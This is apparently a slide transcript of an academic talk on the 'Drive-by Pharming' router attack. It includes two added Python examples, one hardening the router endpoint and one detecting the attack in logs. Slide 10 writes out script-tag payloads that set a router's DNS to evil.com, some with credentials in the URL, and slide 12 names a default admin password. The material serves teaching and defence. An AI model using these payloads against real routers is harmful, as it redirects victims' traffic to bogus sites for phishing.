Drive-by Pharming - PowerPoint PPT Presentation (17 slides)

Presentation Transcript
  1. Drive-by Pharming
  S. Stamm, Z. Ramzan, and M. Jakobsson
  Presented by Anh Le

  2. Authors
  • Sid Stamm - Indiana University - Google Intern
  • Dr. Zulfikar Ramzan - Technical Director of Symantec Security
  • Prof. Markus Jakobsson - Indiana University - Principal Scientist at Palo Alto RC
  Anh Le - UC Irvine - 2009

  3. Outline
  • Introduction
  • Preliminaries and Previous Work
  • Drive-By Pharming
  • Demo
  • New Attacks and Recent Events
  • Conclusion and Discussion

  4. 1. Introduction
  • Motivation:
    • Total control of home broadband routers
    • Phishing (by changing the DNS setting)
    • Botnets (by changing the firmware)
  • How:
    • Attacker sets up an “evil” webpage
    • Victim visits the evil webpage
    • Victim’s home router is compromised
    • No physical proximity required
  • Enablers:
    • JavaScript-enabled web browsers
    • Default password management of the routers

  5. 2a. Preliminaries
  • DNS: Domain Name System
  [Diagram: the client asks the DNS server (home router) “What’s the IP of yahoo.com?”; the server replies “yahoo.com’s IP is 206.190.60.37”]

  6. 2a. Preliminaries (cont.)
  • Phishing: a type of social engineering attack to obtain access credentials
  • Pharming: an attack aiming to redirect a website's traffic to another, bogus website

  7. 2b. Previous Work
  [Diagram: a page on the Internet probes the victim’s browser: “Detecting … Your internal subnet is 10.0.0.0/24!” and “Detecting … You have a Linksys router, and its IP is 10.0.0.1!”]
  • Internal Net Discovery [Kindermann 2003]
    • Java applet
  • Host Scanning [Grossman 2006, SPI Labs 2006]
    • JavaScript
    • Fingerprint router using default password and image name

  8. Outline
  • Introduction
  • Preliminaries and Previous Work
  • Drive-By Pharming
  • Demo
  • New Attacks and Recent Events
  • Conclusion and Discussion

  9. 3. Drive-By Pharming
  [Diagram: a webpage on the Internet reaches the victim’s home router through the browser: “DNS Setting Changed!”]

  10. 3. Drive-By Pharming
  • How is it possible?
    • HTTP GET configuration:
      http://10.0.0.1/apply.cgi?dns=new-dns-server.com
    • Off-site script inclusion:
      <script src="http://10.0.0.1/apply.cgi?dns=evil.com"></script>
    • How about password-protected routers? Credentials go in the URL:
      <script src="http://usr:pwd@10.0.0.1/apply.cgi?dns=evil.com"></script>
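The following is an added example, not code from the slides or from the Stamm, Ramzan and Jakobsson paper. It models the router configuration endpoint from slides 10 to 12 twice: first in the shape the slides describe (a GET to apply.cgi with the factory password changes the DNS setting, so a script tag on any web page can trigger it), then hardened so the same cross-site request is refused. The endpoint name apply.cgi, the address 10.0.0.1 and the admin:admin default come from the slides; the Request and RouterState classes, the token value, the attacker hostname evil.example and the replacement resolver 192.0.2.53 are constructed for illustration.

```python
from dataclasses import dataclass, field
from urllib.parse import urlparse, parse_qs

ROUTER_HOST = "10.0.0.1"                 # LAN address used on the slides
DEFAULT_CREDENTIAL = ("admin", "admin")  # factory default shown on slide 12


@dataclass
class Request:
    method: str
    url: str
    headers: dict
    auth: tuple = ("", "")                       # (user, password) from HTTP Basic auth
    form: dict = field(default_factory=dict)     # POST body fields


@dataclass
class RouterState:
    dns: str = "206.190.60.37"                # illustrative current resolver (constructed)
    password: str = "admin"                   # still the factory default unless changed
    csrf_token: str = "tok-constructed-1234"  # a real device would use a random per-session value


def vulnerable_apply(req: Request, state: RouterState):
    """Behaviour the slides describe: credentials are the only check, so a GET
    issued by a <script src> tag on any web page succeeds against a router
    that still carries its default password."""
    if req.auth != ("admin", state.password):
        return 401, state.dns
    query = parse_qs(urlparse(req.url).query)
    if "dns" in query:
        state.dns = query["dns"][0]
    return 200, state.dns


def hardened_apply(req: Request, state: RouterState):
    """Same endpoint with the controls that stop the drive-by: no state change on
    GET, a same-origin check on Origin/Referer, a CSRF token, and a refusal to
    apply any configuration while the factory password is still in place."""
    if req.method != "POST":
        return 405, state.dns
    if req.auth != ("admin", state.password):
        return 401, state.dns
    if req.auth == DEFAULT_CREDENTIAL:
        return 403, state.dns          # force a password change before anything else
    origin = req.headers.get("Origin") or req.headers.get("Referer") or ""
    if urlparse(origin).hostname != ROUTER_HOST:
        return 403, state.dns          # request was triggered from another site
    if req.form.get("csrf_token") != state.csrf_token:
        return 403, state.dns
    if req.form.get("dns"):
        state.dns = req.form["dns"]
    return 200, state.dns


def drive_by_request() -> Request:
    """What the browser sends when an external page includes the script tag
    from slide 10 against a router with the default password (constructed)."""
    return Request(
        method="GET",
        url="http://10.0.0.1/apply.cgi?dns=evil.com",
        headers={"Referer": "http://evil.example/page.html"},  # constructed attacker page
        auth=DEFAULT_CREDENTIAL,
    )


def owner_request(state: RouterState) -> Request:
    """A legitimate change made from the router's own setup page (constructed)."""
    return Request(
        method="POST",
        url="http://10.0.0.1/apply.cgi",
        headers={"Origin": "http://10.0.0.1"},
        auth=("admin", state.password),
        form={"dns": "192.0.2.53", "csrf_token": state.csrf_token},  # 192.0.2.0/24 is documentation space
    )


def demo():
    """Returns (vulnerable result, hardened result, hardened result for the owner)."""
    vulnerable = vulnerable_apply(drive_by_request(), RouterState())
    hardened = hardened_apply(drive_by_request(), RouterState())
    owner_state = RouterState(password="s3cret-not-default")
    owner = hardened_apply(owner_request(owner_state), owner_state)
    return vulnerable, hardened, owner


if __name__ == "__main__":
    print(demo())
```

Running demo() gives (200, 'evil.com') for the vulnerable endpoint, (405, '206.190.60.37') for the hardened one, and (200, '192.0.2.53') for the owner's same-origin POST. Each of the four checks in hardened_apply blocks the drive-by on its own; the password check matters most in practice because the slides' enabler is precisely that the factory credential is still valid.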

  11. 3. Drive-By Pharming (cont.)
  • Assumptions:
    • JavaScript-enabled web browser
    • Default password management
  • Vulnerable routers:
    • Netgear WGR614
    • D-Link DI-524
    • Linksys WRT54G
    • Cisco 806, 826, …
    • …

  12. 3. Drive-By Pharming (cont.)
  • Verizon MI424-WR [Modem + Router]
    • admin:admin
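Slides 9 to 12 show the attack from the router's side: a configuration request arrives through the victim's browser and the DNS setting changes. The added example below (not from the slides or the paper) is the detection counterpart: it scans the router's HTTP access log for configuration requests that fit the drive-by pattern, i.e. a state change requested through a GET query string, or a request whose Referer is a site other than the router itself. The log lines are constructed here in combined log format; /apply.cgi and 10.0.0.1 come from the slides, while /setup.cgi, the client addresses and the evil.example host are assumptions.

```python
import re
from urllib.parse import urlparse

ROUTER_HOST = "10.0.0.1"
CONFIG_PATHS = {"/apply.cgi", "/setup.cgi"}   # admin endpoints that change settings (assumed)

# Combined log format: src ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample: one normal page view, one legitimate same-origin POST,
# one successful drive-by GET, and one drive-by attempt that failed authentication.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:20:15:01 -0700] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2009:20:15:09 -0700] "POST /apply.cgi HTTP/1.1" 200 512 "http://10.0.0.1/setup.html" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2009:20:16:42 -0700] "GET /apply.cgi?dns=evil.com HTTP/1.1" 200 512 "http://evil.example/page.html" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2009:20:17:00 -0700] "GET /apply.cgi?dns=evil.com HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    target = urlparse(entry["target"])
    entry["path"] = target.path
    entry["query"] = target.query
    entry["status"] = int(entry["status"])
    return entry


def reasons(entry):
    """Why a configuration request looks like a drive-by; empty list means it looks legitimate."""
    out = []
    if entry["path"] not in CONFIG_PATHS:
        return out
    if entry["method"] == "GET" and entry["query"]:
        out.append("state change via GET query string")   # what a <script src> tag can trigger
    ref_host = urlparse(entry["referer"]).hostname if entry["referer"] != "-" else None
    if ref_host is not None and ref_host != ROUTER_HOST:
        out.append(f"cross-site referer {ref_host}")
    return out


def find_drive_by(log_text):
    """Return (src, ts, target, status, reasons) for every flagged request.
    Failed attempts (non-2xx) are kept: they show the attack being tried."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        why = reasons(entry)
        if why:
            hits.append((entry["src"], entry["ts"], entry["target"], entry["status"], why))
    return hits


if __name__ == "__main__":
    for hit in find_drive_by(SAMPLE_LOG):
        print(hit)
```

On the sample log this flags the two GET requests to /apply.cgi and leaves the owner's POST alone. The GET-with-query rule is kept separate from the Referer rule on purpose: browsers and privacy extensions often strip Referer, so a cross-site check by itself would miss the fourth line, and only the presence of a state change in a GET remains as evidence.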

  13. 4. Demo

  14. Outline
  • Introduction
  • Preliminaries and Previous Work
  • Drive-By Pharming
  • Demo
  • New Attacks and Recent Events
  • Conclusion and Discussion

  15. 5. New Attacks and Recent Events
  • New attacks:
    • Growing zombies/botnets, by installing evil firmware
    • Viral spread: a compromised router auto-recruits other routers
  • Recent events:
    • Kaminsky DNS vulnerability (July 2008): cache poisoning attacks on any name server!
    • Router botnets (March 2009!)

  16. 5. Conclusion and Discussion
  • Routers with default password management are easily compromised
  • Browsers act as conduits for attacks on the internal network
  • Army of router botnets

  17. Anh Le - UC Irvine - 2009